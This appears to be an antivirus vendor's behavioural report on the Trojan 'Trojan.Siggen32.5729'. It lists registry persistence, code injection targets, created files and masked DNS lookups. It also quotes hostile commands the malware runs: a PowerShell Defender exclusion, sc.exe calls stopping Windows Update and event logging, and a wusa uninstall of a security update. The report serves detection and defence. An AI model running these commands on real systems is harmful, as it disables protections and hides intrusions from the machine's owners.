Trojan.Siggen32.5729

Technical Information

To ensure autorun and distribution

Sets the following service settings

[HKLM\SYSTEM\CurrentControlSet\Services\PEXENU4K] 'Start' = '00000002'
[HKLM\SYSTEM\CurrentControlSet\Services\PEXENU4K] 'ImagePath' = '%ALLUSERSPROFILE%\e7lenvsel504\33rduw7v2ank.exe'

Creates the following services

'PEXENU4K' %ALLUSERSPROFILE%\e7lenvsel504\33rduw7v2ank.exe

Malicious functions

To complicate detection of its presence in the operating system,

blocks the following features:

Windows Event Logging

adds antivirus exclusion:

'<SYSTEM32>\windowspowershell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force

Injects code into

the following system processes:

<SYSTEM32>\conhost.exe
<SYSTEM32>\dwm.exe

Modifies file system

Creates the following files

%ALLUSERSPROFILE%\e7lenvsel504\33rduw7v2ank.exe
%WINDIR%\temp\__psscriptpolicytest_c02ozb1z.z0z.ps1
%WINDIR%\temp\__psscriptpolicytest_hxvuyu2y.vfm.psm1
%WINDIR%\temp\content\3520-4856-powershell.exe-20-03-35-208.dump
%WINDIR%\temp\content\3520-4856-powershell.exe-20-03-35-432.dump
%WINDIR%\temp\content\3520-4856-powershell.exe-20-03-35-533.dump
%WINDIR%\temp\content\3520-4856-powershell.exe-20-03-35-696.dump
%WINDIR%\temp\content\3520-4856-powershell.exe-20-03-35-734.dump
%WINDIR%\temp\__psscriptpolicytest_lhzq4mrj.adn.ps1
%WINDIR%\temp\__psscriptpolicytest_x00zc212.qwu.psm1
%WINDIR%\temp\content\3520-4856-powershell.exe-20-03-35-881.dump
%WINDIR%\temp\content\3520-4856-powershell.exe-20-03-35-912.dump
%WINDIR%\temp\content\3520-4856-powershell.exe-20-03-35-950.dump
%WINDIR%\temp\content\3520-4856-powershell.exe-20-03-36-035.dump
%WINDIR%\temp\content\3520-4856-powershell.exe-20-03-36-136.dump
%WINDIR%\temp\content\3520-4856-powershell.exe-20-03-36-220.dump
%WINDIR%\temp\content\3520-4856-powershell.exe-20-03-36-314.dump
%WINDIR%\temp\content\3520-4856-powershell.exe-20-03-36-345.dump
%WINDIR%\temp\content\3520-4856-powershell.exe-20-03-36-366.dump
%WINDIR%\temp\content\3520-4856-powershell.exe-20-03-36-384.dump
%WINDIR%\temp\content\3520-4856-powershell.exe-20-03-36-415.dump
%WINDIR%\temp\content\3520-4856-powershell.exe-20-03-36-447.dump
%WINDIR%\temp\content\3520-4856-powershell.exe-20-03-36-462.dump
%WINDIR%\temp\content\3520-4856-powershell.exe-20-03-36-863.dump
%WINDIR%\temp\content\3520-4856-powershell.exe-20-03-36-917.dump
%WINDIR%\temp\content\3520-4856-powershell.exe-20-03-36-948.dump
%WINDIR%\temp\content\3520-4856-powershell.exe-20-03-36-986.dump
%WINDIR%\temp\content\3520-4856-powershell.exe-20-03-37-002.dump
%WINDIR%\temp\content\3520-4856-powershell.exe-20-03-37-064.dump
<SYSTEM32>\config\systemprofile\appdata\local\microsoft\windows\powershell\startupprofiledata-noninteractive
%WINDIR%\temp\xrtzzmdftpla.sys

Deletes following files that it created itself

%WINDIR%\temp\__psscriptpolicytest_c02ozb1z.z0z.ps1
%WINDIR%\temp\__psscriptpolicytest_hxvuyu2y.vfm.psm1
%WINDIR%\temp\__psscriptpolicytest_lhzq4mrj.adn.ps1
%WINDIR%\temp\__psscriptpolicytest_x00zc212.qwu.psm1

Network activity

UDP

DNS ASK pa###bin.com
DNS ASK po##.#ashvault.pro

Miscellaneous

Creates and executes the following

'%ALLUSERSPROFILE%\e7lenvsel504\33rduw7v2ank.exe'

Executes the following

'<SYSTEM32>\cmd.exe' /c wusa /uninstall /kb:890830 /quiet /norestart
'<SYSTEM32>\sc.exe' stop UsoSvc
'<SYSTEM32>\sc.exe' stop WaaSMedicSvc
'<SYSTEM32>\wusa.exe' /uninstall /kb:890830 /quiet /norestart
'<SYSTEM32>\sc.exe' stop wuauserv
'<SYSTEM32>\sc.exe' stop bits
'<SYSTEM32>\sc.exe' stop dosvc
'<SYSTEM32>\powercfg.exe' /x -hibernate-timeout-ac 0
'<SYSTEM32>\powercfg.exe' /x -hibernate-timeout-dc 0
'<SYSTEM32>\powercfg.exe' /x -standby-timeout-ac 0
'<SYSTEM32>\powercfg.exe' /x -standby-timeout-dc 0
'<SYSTEM32>\sc.exe' delete "PEXENU4K"
'<SYSTEM32>\sc.exe' create "PEXENU4K" binpath= "%ALLUSERSPROFILE%\e7lenvsel504\33rduw7v2ank.exe" start= "auto"
'<SYSTEM32>\sc.exe' stop eventlog
'<SYSTEM32>\sc.exe' start "PEXENU4K"
'<SYSTEM32>\dwm.exe'
'<SYSTEM32>\dwm.exe' ' (with hidden window)